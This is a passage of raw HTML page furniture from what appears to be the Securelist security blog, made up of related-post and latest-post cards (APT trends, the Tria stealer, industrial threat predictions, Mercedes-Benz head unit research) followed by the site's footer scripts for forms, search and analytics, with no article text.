c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/apt-report-q3-2024/114623/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/27181956/SL-APT-report-Q3-2024-featured-2-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/27181956/SL-APT-report-Q3-2024-featured-2-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/apt-report-q3-2024/114623/" class="c-card__link">APT trends report Q3 2024</a></h3> </header> </div> </article> </div> </div> </div> </div> <li id="text-22" class="widget widget_text"> <div class="textwidget"><p><a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_ban_sm-team___knext___" target="_blank" rel="noopener"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/10092503/NEXT_310x420_EN_1.jpg" width="370" /></a></p> </div> </li> </div> </div> </div> </div> <div class="c-article__progress rpi-progress-bar"> <div class="c-article__progress-bar__position rpi-progress-bar__position"></div> <div class="rpi-progress-bar__percentage"></div> </div> </article> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal"> <div class="o-container-fluid"> <h5 class="c-block__title">Latest Posts</h5> <div class="o-row o-row--small-gutters@sm c-card__row c-card__row--fixed-width-down@sm js-slider-posts-mobile"> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a 
href="https://securelist.com/tria-stealer-collects-sms-data-from-android-devices/115295/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/23083642/tria-stealer-featured-image-updated-1-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/23083642/tria-stealer-featured-image-updated-1-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/malware-descriptions/" class="c-tag c-tag--primary">Malware descriptions</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/tria-stealer-collects-sms-data-from-android-devices/115295/" class="c-card__link">No need to RSVP: a closer look at the Tria stealer campaign</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/fareedradzi/" > <span>Fareed Radzi</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/industrial-threat-predictions-2025/115327/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/28200425/KSB-ICS-threat-predictions-2025-800x450.png" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="" sizes="auto, (max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/28200425/KSB-ICS-threat-predictions-2025-800x450.png" 
data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/28200425/KSB-ICS-threat-predictions-2025-800x450.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/28200425/KSB-ICS-threat-predictions-2025-300x170.png 300w" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/kaspersky-security-bulletin/" class="c-tag c-tag--primary">Kaspersky Security Bulletin</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/industrial-threat-predictions-2025/115327/" class="c-card__link">Threat predictions for industrial enterprises 2025</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/evgenygoncharov/" > <span>Evgeny Goncharov</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/mercedes-benz-head-unit-security-research/115218/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/16112547/mercedes-benz-featured-image-3-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/16112547/mercedes-benz-featured-image-3-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/research/" class="c-tag c-tag--primary">Research</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/mercedes-benz-head-unit-security-research/115218/" class="c-card__link">Mercedes-Benz 
_recaptcha_wordpress_savedcomment; } </script><script type="text/javascript" src="https://kasperskycontenthub.com/securelist/wp-content/plugins/kaspersky-embeds/js/scripts.js?ver=1.0" id="kspr_embeds-js"></script> <script type="text/javascript" src="https://www.google.com/recaptcha/api.js?render=explicit&ver=202124050927" id="kaspersky-dynamic-gravity-forms-google-recaptcha-js"></script> <script type="text/javascript" id="crayon_js-js-extra"> /* <![CDATA[ */ var CrayonSyntaxSettings = {"version":"_2.7.2_beta","is_admin":"0","ajaxurl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""}; var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"}; /* ]]> */ </script> <script type="text/javascript" id="kaspersky-dynamic-gravity-forms-main-js-extra"> /* <![CDATA[ */ var kasperskyDynamicaReCaptchaData = {"ajaxUrl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type="text/javascript" id="kaspersky-omniture-js-extra"> /* <![CDATA[ */ var kaspersky = {"pageName":"Kaspersky Securelist","pageType":"blog","platformName":"Micro Site","businessType":"b2c","siteLocale":"en-GLOBAL"}; /* ]]> */ </script> <script type="text/javascript" id="wp-autosearch-script-js-extra"> /* <![CDATA[ */ var wp_autosearch_config = 
{"autocomplete_taxonomies":{"0":"category"},"split_results_by_type":"true","search_title":"true","search_content":"false","search_terms":"false","search_exactonly":"true","order_by":"title","order":"DESC","search_comments":"false","search_tags":"false","no_of_results":"5","description_limit":"100","title_limit":"50","excluded_ids":{},"excluded_cats":{"0":0},"full_search_url":"https:\/\/kasperskycontenthub.com\/securelist\/?s=%q%","min_chars":"3","ajax_delay":"200","cache_length":"200","autocomplete_sortorder":"posts","thumb_image_display":"false","thumb_image_width":"50","thumb_image_height":"50","get_first_image":"true","force_resize_first_image":"true","thumb_image_crop":"true","default_image":"https:\/\/kasperskycontenthub.com\/securelist\/wp-content\/plugins\/wp-autosearch\/assert\/image\/default.png","search_image":"","display_more_bar":"false","display_result_title":"false","enable_token":"true","custom_css":"","custom_js":"","try_full_search_text":"Search more...","no_results_try_full_search_text":"No Results!","show_author":"false","show_date":"false","description_result":"false","color":{"results_even_bar":"E8E8E8","results_odd_bar":"FFFFFF","results_even_text":"000000","results_odd_text":"000000","results_hover_bar":"5CCCB2","results_hover_text":"FFFFFF","seperator_bar":"2D8DA0","seperator_hover_bar":"6A81A0","seperator_text":"FFFFFF","seperator_hover_text":"FFFFFF","more_bar":"5286A0","more_hover_bar":"4682A0","more_text":"FFFFFF","more_hover_text":"FFFFFF","box_border":"57C297","box_background":"FFFFFF","box_text":"000000"},"title":{"page":"Pages","post":"Posts","webinars":"Webinars"},"post_types":{"0":"page","1":"post","2":"webinars"},"nonce":"cd5b7c7657","ajax_url":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type="text/javascript" id="securelist-script-js-extra"> /* <![CDATA[ */ var securelist2020Data = 
{"ajaxUrl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php","loading":"Loading...","marketoBaseURL":"","marketoVirtualForm":"27241","munchkinID":"802-IJN-240","reCaptcha_key":"6Lf2eUQUAAAAAC-GQSZ6R2pjePmmD6oA6F_3AV7j"}; /* ]]> */ </script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/js/min/crayon.min.js,wp-content/plugins/kaspersky-gravity-forms-dynamic-recaptcha/assets/js/main.js,wp-content/plugins/kaspersky-lazy-load/assets/js/main.js,wp-content/plugins/kaspersky-omniture/assets/dataLayer.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/migrate.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/autocomplete.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/ajax-script.js,wp-content/plugins/wds-no-login-autocomplete/js/script.js,wp-content/themes/securelist2020/assets/js/main.js,wp-includes/js/comment-reply.min.js'></script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/akismet/_inc/akismet-frontend.js,wp-includes/js/dist/dom-ready.min.js,wp-includes/js/dist/hooks.min.js,wp-includes/js/dist/i18n.min.js,wp-includes/js/dist/a11y.min.js'></script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/jquery.json.min.js?ver=2.5.16.3" id="gform_json-js"></script> <script type="text/javascript" id="gform_gravityforms-js-extra"> /* <![CDATA[ */ var gform_i18n = {"datepicker":{"days":{"monday":"Mon","tuesday":"Tue","wednesday":"Wed","thursday":"Thu","friday":"Fri","saturday":"Sat","sunday":"Sun"},"months":{"january":"January","february":"February","march":"March","april":"April","may":"May","june":"June","july":"July","august":"August","september":"September","october":"October","november":"November","december":"December"},"firstDay":1,"iconText":"Select date"}}; var gf_global = {"gf_currency_config":{"name":"U.S. 
Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. 
The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; /* ]]> */ </script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/gravityforms.min.js?ver=2.5.16.3" id="gform_gravityforms-js"></script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/placeholders.jquery.min.js?ver=2.5.16.3" id="gform_placeholder-js"></script> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() { jQuery(document).on('gform_post_render', function(event, formId, currentPage){if(formId == 11) {if(typeof Placeholders != 'undefined'){ Placeholders.enable(); }} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} ) } ); /* ]]> */ </script> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() { jQuery(document).trigger('gform_post_render', [11, 1]) } ); /* ]]> */ </script> </body> </html>